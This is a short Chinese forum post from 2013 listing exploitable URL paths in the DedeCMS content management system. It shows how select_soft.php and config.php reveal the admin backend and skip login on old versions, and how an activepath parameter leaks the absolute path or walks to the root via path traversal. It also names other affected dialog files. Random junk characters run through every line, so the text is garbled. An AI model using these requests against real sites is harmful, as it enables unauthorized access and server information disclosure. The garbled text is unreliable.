1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理- c/ D* S. j+ S4 o& C
9 u/ r" d" d3 q/ T/ q0 S
员帐号,新版本的就直接转向了后台.
% X. Z% B& ~' f# Z8 n; G
! z& h9 m; D- v/ i, k. r0 L6 m2.include/dialog/config.php会爆出后台管理路径/ q& ~1 m$ K$ Z' p5 e; D4 r* q# X
3 R" c, y! x- ?9 `6 X9 T( _3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
. O* H1 A/ H# z/ @/ }5 h- `1 n5 j7 i7 T7 s7 j, U
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
P( x7 S, k; m) a# x: [8 ~5 g, y* W' g: q3 W% y
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
3 _, d; `2 E3 U4 D# {
. T, a g( m* B) h- c% v: c到根目录去.不过这些版本的访问地址有些不同.
$ ]9 \! u, Z, F9 Z地址为require/dialog/select_soft.php?activepath=/././././././././4 I5 |5 o+ A& C. o# Y( h9 c
: `' |- ]/ c/ G; k3 ]6 |3 w# o, Ninclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..* R4 A! z, ^) F: o+ U7 n0 i7 L' i
存在相同问题的文件还有
( |) Z r* h) J5 @include\dialog\select_images.php
5 t( |4 _# d, ^6 z! a3 ?; Qinclude\dialog\select_media.php
/ q0 u$ _% D K V' Jinclude\dialog\select_templets.php
) v( v/ |: n% G& P8 h6 w9 ?) W |
发表于 2013-4-16 16:50:43
收藏
支持
反对